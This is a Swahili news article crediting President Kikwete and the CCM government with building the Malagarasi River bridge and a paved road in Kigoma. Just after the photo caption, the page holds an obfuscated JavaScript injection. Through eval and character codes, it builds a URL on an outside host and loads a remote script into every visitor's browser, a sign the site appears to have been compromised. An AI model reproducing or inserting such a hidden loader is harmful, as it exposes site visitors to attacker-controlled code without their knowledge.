Recent Comments

Daraja la Kikwete kielelezo cha ufanisi wa kazi

By Baraka Bitariho Sep 7, 2015
<p>Daraja la Kikwete kwenye Mto Malagarasi wilaya ya Uvinza mkoani Kigoma</p><script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>
Daraja la Kikwete kwenye Mto Malagarasi wilaya ya Uvinza mkoani Kigoma
Daraja la Kikwete kwenye Mto Malagarasi wilaya ya Uvinza mkoani Kigoma

“NIMETIMIZA ahadi yangu niliyoingia nayo Ikulu mwaka 2005, naondoka nikiwa na amani kwamba kero ya muda mrefu ya wananchi wa mkoa Kigoma kuhusu tatizo la daraja kwenye mto Malagarasi nimeimaliza”.

Rais Jakaya Kikwete anayasema hayo Julai mwaka 2011 wakati wa hafla ya kuweka jiwe la msingi kwa ajili ya ujenzi wa daraja la Mto Malagarasi wilaya ya Uvinza mkoani Kigoma. Uwekaji jiwe la msingi kwenye daraja hilo liitwalo Daraja la Kikwete ni kielelezo cha dhamira ya kiongozi huyo kutekeleza alichowaahidi wananchi. Kwa muda mrefu daraja hilo limekuwa ajenda za wabunge wa Mkoa wa Kigoma kutokana na taabu ambayo wananchi walikuwa wakiipata wakati wa masika wakati maji ya Mto Malagarasi yanapojaa na kumwagika nje ya kingo zake.

Historia inaonesha kuwa wakati daraja hilo limejaa kulikuwa hakuna namna nyingine ya kuweza kusafiri kupitia hapo hivyo shughuli za wananchi na za utendaji za serikali zilikuwa zikiathirika kwa kiasi kikubwa. Magari yalilazimika kuzunguka kupitia barabara ya Nyakanazi na kupitia mikoa ya Kagera, Geita, Shinyanga na Tabora ili yaweze kuingia tarafa ya Nguruka wilaya ya Uvinza umbali zaidi ya kilometa 600.

Mabasi ya abiria yalilazimika kupokezana abiria kwa kila basi kusimama upande mmoja wa barabara na abiria kulazimika kupitia kwa miguu kwa kutumia njia ya reli ambayo ilikuwa ni hatari. Nakumbuka Mbunge wa jimbo la Kigoma Kusini ambaye aliingia bungeni kwa mara ya kwanza mwaka 2010 amewahi kupigia kelele na kutaka kuzuia bajeti ya wizara ya ujenzi kwa kutoa shilingi kutokana na kile alichoamini kwamba serikali haikuwa na nia ya dhati ya kujenga daraja hilo.

Kauli mbalimbali zilizokuwa zikitolewa na wabunge, madiwani na wananchi wa mkoa Kigoma zilikuwa mwiba kwa Rais Kikwete na kusababisha afanye jitihada za ziada kuhakikisha utekelezaji wa mradi huo unaanza kabla hajaondoka madarakani. Rais Kikwete anasema, alipoingia madarakani mwaka 2005 alijiwekea dhamira ya kuhakikisha kwamba pamoja na miradi mingine itakayotekelezwa mkoani Kigoma ujenzi wa daraja hilo iwe moja ya ajenda zake muhimu.

Ni wazi kwamba wakati atakapokabidhi madaraka Rais Kikwete ataondoka akiwa na amani kwamba ameufanyia mkoa Kigoma mambo mema ukiwemo ujenzi wa daraja hilo. Ujenzi wa Daraja la Kikwete ni kielelezo cha utayari wa serikali inayoongozwa na Chama Cha Mapinduzi (CCM) kutekeleza miradi iliyokuwa kero kwa wananchi hasa masikini. Ujenzi wa daraja hilo umekwenda sambamba na ujenzi wa barabara ya kiwango cha lami kwa kilometa 48.

Ujenzi huo umekuwa chachu ya maendeleo kwa mkoa Kigoma kwa kuwa sasa daraja hilo na barabara hiyo vimekuwa miundombinu muhimu katika utekelezaji wa shughuli mbalimbali. Mabasi ya abiria kwenda Dodoma na Dar es Salaam na magari ya mizigo yanatumia barabara hiyo hivyo kupunguza urefu wa safari ukilinganisha na barabara ya Kigoma hadi Nyakanazi. Barabara hiyo imekuwa ukomboazi kwa wakulima na wavuvi kwa kuwa ndizi kutoka nyanda za juu za Mkoa wa Kigoma zinaweza kusafirishwa kupelekwa Dar es Salaam kwa kutumia siku moja, samaki aina ya migebuka wanasafirishwa wabichi kwenda Tabora, Singida na Dodoma.

Daraja la Malagarasi na barabara hiyo vimeamsha ari ya watu kwenda Kigoma kutafuta fursa za uwekezaji kwa kuwa wamejengwa imani kwamba wanaweza kusafiri kwa magari kwa siku moja kwenda mkoani humo ikiwa watakosa usafiri wa ndege. Rais Kikwete anasema kwa namna serikali ilivyojipanga na hali inavyokwenda ni wazi Tanzania ya mwaka 2020 itakuwa na tofauti kubwa na Tanzania ya sasa ukiwemo mkoa Kigoma ambao utakuwa na mabadiliko na maendeleo makubwa kwa wakati huo.

Waziri wa Ujenzi, John Magufuli anasema wakati wa uwekaji wa jiwe la msingi la daraja hilo kuwa, hadi kukamilika kwake ujenzi wa Daraja la Kikwete na barabara ya kilometa 48 kwa kiwango cha lami litagharimu kiasi cha Sh bilioni 805. Ujenzi wa daraja hilo unatokana na mkopo wa masharti nafuu kutoka serikali ya Jamhuri ya Watu wa Korea na wametoa pia wakandarasi kwa ajili ya kazi hiyo.

Magufuli anasema, mradi huo unahusisha ujenzi wa daraja kubwa lenye urefu wa mita 200 na madaraja ya pembeni mawili yenye urefu wa mita 50 na mita 25 sambamba na ujenzi wa makaravati 10 ya zege na makaravati 80 madogo katika barabara ya kiwango cha lami. Mbunge wa Kigoma Kusini, David Kafulila anaipongeza serikali hasa Rais Kikwete kwa namna anavyoonesha mapenzi makubwa kwa Mkoa wa Kigoma kwa kujenda daraja hilo na miradi mingine ya barabara kwa kiwango lami.

Katika jimbo hilo pamoja na ujenzi wa daraja hilo, serikali pia imekamilisha ujenzi wa barabara ya kiwango cha lami kilometa 71 kutoka Kidahwe hadi mji mdogo wa Uvinza. Wananchi wa Kigoma wameridhishwa utekelezaji wa miradi ya maendeleo mkoani humo. Mkazi wa mji mdogo wa Nguruka wilaya ya Uvinza mkoani Kigoma, Mtemi Shaibu anasema, ujenzi wa Daraja la Kikwete ni muhimu kwao ajili ya usafiri na shughuli za kiuchumi.

Mtemi anasema, kwa sasa abiria anaweza kusafiri kutoka Kigoma saa 12 asubuhi na kufika Tabora saa 7:00 mchana, na atafika Dodoma saa 12. Balozi wa Jamhuri ya Watu wa Korea nchini, Yoong Hoon Kim anasema, ujenzi wa daraja hilo unaonesha uhusiano wa karibu wa kindugu kati ya serikali ya Tanzania na Korea na kwamba nchi hiyo itaongeza misaada kwa Tanzania.

Pamoja kujenga daraja hilo na miradi mingine, serikali ya awamu ya nne imejenga barabara ya kiwango cha lami kilometa 60 kutoka Mwandiga hadi Manyovu mpakani na nchi jirani ya Burundi. Serikali ya Awamu ya Nne pia imefanikisha uwekaji jenereta nne mpya za umeme mkoani Kigoma ikiwemo ya wilayani Kasulu na Kibondo hivyo kuwawezesha wananchi wa mkoa huo kusahau matatizo ya umeme. Raisi Kikwete anamaliza muda wake kuliongoza taifa akiacha mradi mkubwa wa maji unatekelezwa katika manispaa ya Kigoma Ujiji ili kumaliza shida ya maji inayowakabili wananchi.

By Baraka Bitariho

Simamia is a news house where visitors will get up to date information on news, events, and so on. Join us to get updated, entertained and learn. Our website is www.Simamia.com or email us at SimamiaTeam@gmail.com